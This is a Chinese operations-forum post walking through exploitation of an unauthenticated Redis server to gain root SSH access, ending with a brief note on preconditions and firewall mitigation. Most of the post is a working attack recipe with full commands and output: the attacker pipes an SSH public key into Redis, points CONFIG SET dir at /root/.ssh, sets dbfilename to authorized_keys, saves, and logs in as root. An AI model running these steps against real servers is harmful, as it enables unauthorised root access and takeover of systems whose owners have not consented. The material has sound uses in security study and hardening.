服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

运维之家

 找回密码
 注册
搜索
查看: 94|回复: 0

redis无授权访问漏洞结合ssh实现提权

[复制链接]
dirtysea 发表于 2019-9-26 10:35:00 | 显示全部楼层 |阅读模式
1. 漏洞概述(知道创宇)
Redis默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下可以利用Redis的相关方法,可以成功在Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器。
默认redis启动的用户如果没有修改,会以root方式启动,这样就redis就可以在任意位置写入公钥文件,继而可以完成远程控制。

2. 漏洞利用原理
a. redis监听在外网的6379端口,且无密码访问
b. 连接redis,可以指定redis的配置文件路径
c. 连接redis,将公钥以key值的方式写入redis,并且保存为authoried_keys
d. 远程ssh无密码连接

3.漏洞利用过程
a. 目标主机:192.168.1.105
b. 攻击主机:192.168.1.100
c. 远程redis连接,查看一下当前keys
  • tusmdeMacBook-Pro-9:ssh tusm$ redis-cli -h 192.168.1.105
  • 192.168.1.105:6379> KEYS *
  • (empty list or set)
  • 192.168.1.105:6379>

[color=rgb(85, 85, 85) !important]复制代码


d. 生成公私钥文件
  • tusmdeMacBook-Pro-9:/ tusm$ mkdir -pv /tmp/ssh
  • tusmdeMacBook-Pro-9:/ tusm$ cd /tmp/ssh/
  • tusmdeMacBook-Pro-9:ssh tusm$ ssh-keygen -t rsa
  • Generating public/private rsa key pair.
  • Enter file in which to save the key (/Users/tusm/.ssh/id_rsa): /tmp/ssh/id_rsa
  • Enter passphrase (empty for no passphrase):
  • Enter same passphrase again:
  • Your identification has been saved in /tmp/ssh/id_rsa.
  • Your public key has been saved in /tmp/ssh/id_rsa.pub.
  • The key fingerprint is:
  • 15:bc:01:d1:57:c9:c2:9a:60:c9:6c:fa:fe:f8:41:65 tusm@tusmdeMacBook-Pro-9.local
  • The key's randomart image is:
  • +--[ RSA 2048]----+
  • |       oo*.. o.. |
  • |        B +.+ o  |
  • |       + ..*E.   |
  • |      .  .+o     |
  • |       .S .      |
  • |        ..       |
  • |       .  .      |
  • |        .. .     |
  • |        .oo      |
  • +-----------------+
  • tusmdeMacBook-Pro-9:ssh tusm$ ls
  • id_rsa      id_rsa.pub
  • tusmdeMacBook-Pro-9:ssh tusm$ (echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > kali.txt
  • tusmdeMacBook-Pro-9:ssh tusm$ cat kali.txt
  • ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuRr4Adw53lIw4bA0YIocJ56o2IUcPTXESIU4d/I6peQLH9XN+NrDcRUBixocr8mjpDssNaNW8LKrE+JvlrFGU3p93gnVDnj2jfhYSWGvx35u9+pokCCZmU40zq8rOx9Bo37v1klBCZ+95LFTugbNkkNJDjNA7WsJtouVxGCcyK7GfNsNaWgCRqJ3O55z/ie4XN/AC3Qj2Qh1DoannPeudIaH59Qa7k2NGbtzp98HIDhSZuXp9RqQ2wIicAgScKU9qpV7PSvhLj3H7AhHBM4Q+GY+/yz2oVdVnK24fAek4oJ6dkZK95na22Sf3y6mDUvuPaehKt6rYb5loekRbVBxz tusm@tusmdeMacBook-Pro-9.local
  • tusmdeMacBook-Pro-9:ssh tusm$


[color=rgb(85, 85, 85) !important]复制代码


e. 将公钥以key值的形式写入redis
  • tusmdeMacBook-Pro-9:ssh tusm$ cat kali.txt |redis-cli -h 192.168.1.105 -x set crackit
  • OK
  • tusmdeMacBook-Pro-9:ssh tusm$ redis-cli -h 192.168.1.105
  • 192.168.1.105:6379> KEYS *
  • 1) "crackit"
  • 192.168.1.105:6379> GET crackit
  • "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuRr4Adw53lIw4bA0YIocJ56o2IUcPTXESIU4d/I6peQLH9XN+NrDcRUBixocr8mjpDssNaNW8LKrE+JvlrFGU3p93gnVDnj2jfhYSWGvx35u9+pokCCZmU40zq8rOx9Bo37v1klBCZ+95LFTugbNkkNJDjNA7WsJtouVxGCcyK7GfNsNaWgCRqJ3O55z/ie4XN/AC3Qj2Qh1DoannPeudIaH59Qa7k2NGbtzp98HIDhSZuXp9RqQ2wIicAgScKU9qpV7PSvhLj3H7AhHBM4Q+GY+/yz2oVdVnK24fAek4oJ6dkZK95na22Sf3y6mDUvuPaehKt6rYb5loekRbVBxz tusm@tusmdeMacBook-Pro-9.local\n\n\n\n"
  • 192.168.1.105:6379> CONFIG GET dir
  • 1) "dir"
  • 2) "/var/lib/redis"
  • 192.168.1.105:6379> CONFIG set dir /root/.ssh/
  • OK
  • 192.168.1.105:6379> config set dbfilename "authorized_keys"
  • OK
  • 192.168.1.105:6379> save
  • OK
  • 192.168.1.105:6379> CONFIG set dir /var/lib/redis
  • OK
  • 192.168.1.105:6379> save
  • OK
  • #这样就把公钥写进受害者主机的/root/.ssh下,并且名称为authorized_keys,了解ssh的都会知道,这样我们就完成了远程无密码访问。


[color=rgb(85, 85, 85) !important]复制代码


f. 远程登录
  • tusmdeMacBook-Pro-9:ssh tusm$ ssh -i id_rsa root@192.168.1.105
  • Last login: Sun Jun  5 08:55:10 EDT 2016 from 192.168.1.100 on pts/2
  • Linux kali 4.3.0-kali1-amd64 #1 SMP Debian 4.3.3-7kali2 (2016-01-27) x86_64
  • The programs included with the Kali GNU/Linux system are free software;
  • the exact distribution terms for each program are described in the
  • individual files in /usr/share/doc/*/copyright.
  • Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
  • permitted by applicable law.
  • root@kali:~#

[color=rgb(85, 85, 85) !important]复制代码

备注:这里redis漏洞之所以能够利用成功,一是无授权访问,而是以root用户运行,这样就可以跳过猜执行用户,而直接将公钥些人root下面,如果是以普通用户当然也能猜到,但是会耗费很大的力气。而且如果默认运行的用户是没有登录权限的,也是无法利用成功的。还有,即使这些条件都满足,但是我们做了防火墙策略,只允许某些IP地址登录,也是可以避免这种提权的,只是redis服务器的数据可以任意更改。




https://bbs.ichunqiu.com/thread-7069-1-1.html
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|手机版|Archiver|运维之家 ( 蜀ICP备12020351号 )

GMT+8, 2019-10-21 00:22 , Processed in 0.068767 second(s), 14 queries .

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表